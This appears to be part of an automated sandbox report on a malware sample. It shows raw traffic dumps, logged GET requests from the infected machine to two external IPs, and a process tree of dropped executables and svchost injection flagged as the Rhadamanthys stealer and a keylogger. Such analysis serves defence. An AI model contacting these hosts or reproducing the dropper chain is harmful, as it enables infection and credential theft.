                                                                                                                                                                                                                                                  Data Ascii: 1a@ #o;R`_|#|H%0SH9~`aa-1gH)2sLGnc <k[63
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:48.872015953 CET1236INData Raw: d3 d3 c0 0b 8a 7f b8 97 4e 22 4f ca 14 06 f0 a4 fe ab cc ab ac 94 22 41 1c 65 72 b1 a1 b5 80 5e 31 c0 cd f5 46 7f 2e a6 44 0d c3 f3 5b 60 96 13 5c 9d b4 83 4f f6 f0 35 44 7d 2b ea 99 13 61 4c 2e 41 60 a3 15 7d 34 29 77 78 23 0f 30 4a ae 21 f3 ba
                                                                                                                                                                                                                                                  Data Ascii: N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz|dNz=5%xuA~P{m2[Nz"Nz/`nO!|I7XL!z?K3GB&CPXL_6<$v!afZ96*.3
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:48.872097015 CET1236INData Raw: 2c 88 74 8b b7 76 62 a3 c9 c5 27 d0 2a 27 5c 3d 75 89 75 b6 08 e3 64 b7 af 9f 42 79 11 1c 3a 2f e8 fa 1f 02 ca 7a 20 84 ab 43 6c 66 1d 11 79 ac b5 00 76 a0 c4 46 b4 fc 34 6f d3 2b 57 54 fd 5a a7 ba 6a 03 af 6d 51 1f 49 41 51 5f 04 c7 8a c5 5b a2
                                                                                                                                                                                                                                                  Data Ascii: ,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]rG.sM=Is$aZt&ID. MzL2V7*QIu;5f;kIB*w%zH-L=_k_/i
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:48.872328997 CET248INData Raw: 7a fe 71 03 99 6d 41 8c fb 0c b8 8a 45 80 8e 7f ee d8 c3 f9 c4 c0 8c 7f b4 fd 48 e2 80 d4 a2 0b e7 83 a2 eb b5 e0 d3 1c 9b c2 5d 36 a2 1a fd fc b3 74 e2 3a 01 a3 46 ae f8 b7 c7 f6 76 71 10 6c 44 90 f8 85 c7 d1 11 19 b7 46 54 d6 b3 fe b3 a2 7c 9a
                                                                                                                                                                                                                                                  Data Ascii: zqmAEH]6t:FvqlDFT|JG9_,l{!G6eMqP_dUxqZI^lxA`_}Kc7aRk/;V)(9!U}hs0{TMuVZ1_7<zjv3
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:48.874139071 CET1236INData Raw: fc 04 b1 a3 61 a9 3e e9 b8 4f 99 39 08 9c 69 da 46 18 36 3a 4b 73 dc 66 d7 fd c6 fb 18 c4 f0 71 ec dd 69 3d 4e 7f d9 ab 61 42 45 69 3f 09 c2 f8 94 ed f4 9a d9 59 30 4f 65 5b 90 4f 6d 9a d5 80 e7 09 b9 42 31 f9 9c c9 1a 0a 46 5f a8 4d 51 63 eb a7
                                                                                                                                                                                                                                                  Data Ascii: a>O9iF6:Ksfqi=NaBEi?Y0Oe[OmB1F_MQc ~)sWh7z4>(our*Q< M9K=2B[,/+?~gg).L{A]rbAx=p5KZ;ZrZ_f5dQUe
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:48.874206066 CET1236INData Raw: c7 b6 4a 74 d2 29 ae 30 5a 13 0d c5 bd ad 85 62 e6 41 ba 2c db e4 33 17 af 92 97 e8 c2 50 6f d3 93 2b 1a d9 ef c8 8c ad 28 76 b1 0a 03 22 aa a4 9d d6 19 b7 f4 a3 21 68 33 93 55 49 99 92 85 49 83 f2 c1 f7 84 ba 94 17 67 0a b6 68 7c b3 3e 5f 83 de
                                                                                                                                                                                                                                                  Data Ascii: Jt)0ZbA,3Po+(v"!h3UIIgh|>_C+]`OG3de{tlnAj}xAD|kH9GV^zmT{y;c}w3pRy<V=5a=dUYW-XW>1-2$i00*vq=,P
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:48.874208927 CET248INData Raw: 4d 81 90 a2 d9 c9 ea 87 af e7 54 a4 00 ee 8f 86 4d 10 1b 06 cf bd 41 22 9f f2 47 09 3b 4c 20 17 59 91 37 2b c7 68 ae 66 7e 0f 1e 64 ca 7d 4d 56 36 9b 98 57 4e 5b 31 b4 bc 26 40 53 81 3d 1a 94 77 ce 40 60 b6 2c f1 68 f6 fc 84 5d 67 33 81 46 d2 a2
                                                                                                                                                                                                                                                  Data Ascii: MTMA"G;L Y7+hf~d}MV6WN[1&@S=w@`,h]g3Fq${:T;;hkRfjF7aC;@58Ht}uos(h/R#`qk1#a_Jx;JO)j <SmPC9P/ScTvD6>$Z
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:48.875376940 CET1236INData Raw: 4e 19 dd 3f ca 7c 76 56 25 cf d8 3b bc 0b cb e3 6b 61 d1 e8 74 ba 7b 9f f2 d9 3c 68 04 7d 8e 0f 0c b1 61 58 b2 89 2e a3 d7 a5 a6 67 de 63 77 82 29 21 e5 dc b8 b5 12 44 63 2f 26 6e 80 a8 59 93 9f f3 cb a5 38 f6 7d 47 18 0a fd 1a 10 c3 fc da 46 76
                                                                                                                                                                                                                                                  Data Ascii: N?|vV%;kat{<h}aX.gcw)!Dc/&nY8}GFvfnz)W'#vqDVkjGT$@o|fRdgFUVt't99#7><[CwN^>nxLWU63tuI-KS<9~
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:48.875437975 CET1236INData Raw: e5 38 c4 33 36 b0 03 f5 cd c9 c0 30 b1 37 44 42 dc 55 49 55 be c3 68 9c 69 c1 11 97 33 09 f5 76 ba 2b 0b 44 51 96 3f 74 91 be 35 c3 11 5f 83 8f cf 2a 84 ec eb a0 7d 4e 67 ca 43 62 ca 3b 51 15 6c 2a 2d 10 a2 fa b7 6f fe 5b 39 e1 7d f2 d3 40 47 ee
                                                                                                                                                                                                                                                  Data Ascii: 83607DBUIUhi3v+DQ?t5_*}NgCb;Ql*-o[9}@Gg~@kk3;w=eZLp<0 X6Gj6b1T2<=dMp.t/>,7HD)a,Cs} %)CLXw,df$F>k
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:48.990930080 CET1236INData Raw: 0a 6a 9f 08 33 5a b8 00 48 32 c0 9b 00 87 ff 75 44 54 a0 95 d1 eb 90 73 bc 0a c4 df 11 25 1f 31 aa b6 c3 e9 8c f3 97 77 2f 07 de 35 8c cb ba ad dd 7f 5a 81 a2 04 d4 61 14 71 3a 99 5f 6b 8e a0 d8 d1 1f 7d 48 03 a6 3a b5 d6 73 77 b7 85 37 8f 19 14
                                                                                                                                                                                                                                                  Data Ascii: j3ZH2uDTs%1w/5Zaq:_k}H:sw7d%hkc}s9BaOQQs?pisbbMFvQSE@l=)0x"./<x&+n>14#<Xo_:*q6!9


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                  57192.168.2.1150085185.215.113.6680
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:51.019076109 CET166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:52.381247044 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:35:52 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                  58192.168.2.115008791.202.233.14180
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:55.551012039 CET166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:56.905462980 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:35:56 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                  59192.168.2.115008991.202.233.14180
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:59.095434904 CET166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:36:00.434921026 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:36:00 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:11:31:36
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\f5TWdT5EAc.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\f5TWdT5EAc.exe"
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  File size:476'995 bytes
                                                                                                                                                                                                                                                  MD5 hash:001C8845E2489435657B200199B369F8
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                  Start time:11:31:39
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\34D7.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\34D7.exe"
                                                                                                                                                                                                                                                  Imagebase:0x250000
                                                                                                                                                                                                                                                  File size:10'240 bytes
                                                                                                                                                                                                                                                  MD5 hash:08DAFE3BB2654C06EAD4BB33FB793DF8
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                  • Detection: 88%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                  Start time:11:31:44
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\896429707.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\896429707.exe
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  File size:80'896 bytes
                                                                                                                                                                                                                                                  MD5 hash:0C883B1D66AFCE606D9830F48D69D74B
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                  • Detection: 96%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                  Start time:11:31:47
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  File size:80'896 bytes
                                                                                                                                                                                                                                                  MD5 hash:0C883B1D66AFCE606D9830F48D69D74B
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 96%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                  Start time:11:31:59
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\sysnldcvmr.exe"
                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                  File size:80'896 bytes
                                                                                                                                                                                                                                                  MD5 hash:0C883B1D66AFCE606D9830F48D69D74B
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                  Start time:11:32:00
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1171111125.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\1171111125.exe
                                                                                                                                                                                                                                                  Imagebase:0x550000
                                                                                                                                                                                                                                                  File size:9'216 bytes
                                                                                                                                                                                                                                                  MD5 hash:323CB4364490F83204B51B0F7F3766F4
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 75%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                                  Start time:11:32:04
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\2779421088.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\2779421088.exe
                                                                                                                                                                                                                                                  Imagebase:0xf40000
                                                                                                                                                                                                                                                  File size:449'536 bytes
                                                                                                                                                                                                                                                  MD5 hash:BD0CAD52FD3A6537CC7AF21852619340
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000009.00000003.1602277553.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000009.00000003.1606012463.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.1605258537.00000000035A0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.1605094211.0000000003380000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                  • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                                  Start time:11:32:06
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                                                                                                                  Imagebase:0x130000
                                                                                                                                                                                                                                                  File size:46'504 bytes
                                                                                                                                                                                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000003.1606124598.00000000027F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000A.00000002.1704824267.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.1608329177.0000000004EC0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                                  Start time:11:32:08
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\78476062.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\78476062.exe
                                                                                                                                                                                                                                                  Imagebase:0x7c0000
                                                                                                                                                                                                                                                  File size:10'240 bytes
                                                                                                                                                                                                                                                  MD5 hash:96509AB828867D81C1693B614B22F41D
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                  • Detection: 91%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                                  Start time:11:32:16
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\fontdrvhost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff7164f0000
                                                                                                                                                                                                                                                  File size:827'408 bytes
                                                                                                                                                                                                                                                  MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                                  Start time:11:32:16
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\640832494.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\640832494.exe
                                                                                                                                                                                                                                                  Imagebase:0x1d0000
                                                                                                                                                                                                                                                  File size:54'784 bytes
                                                                                                                                                                                                                                                  MD5 hash:84897CA8C1AA06B33248956AC25EC20A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 39%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                                  Start time:11:32:19
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                  Imagebase:0x7ff68dea0000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                                  Start time:11:32:19
                                                                                                                                                                                                                                                  Start date:05/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
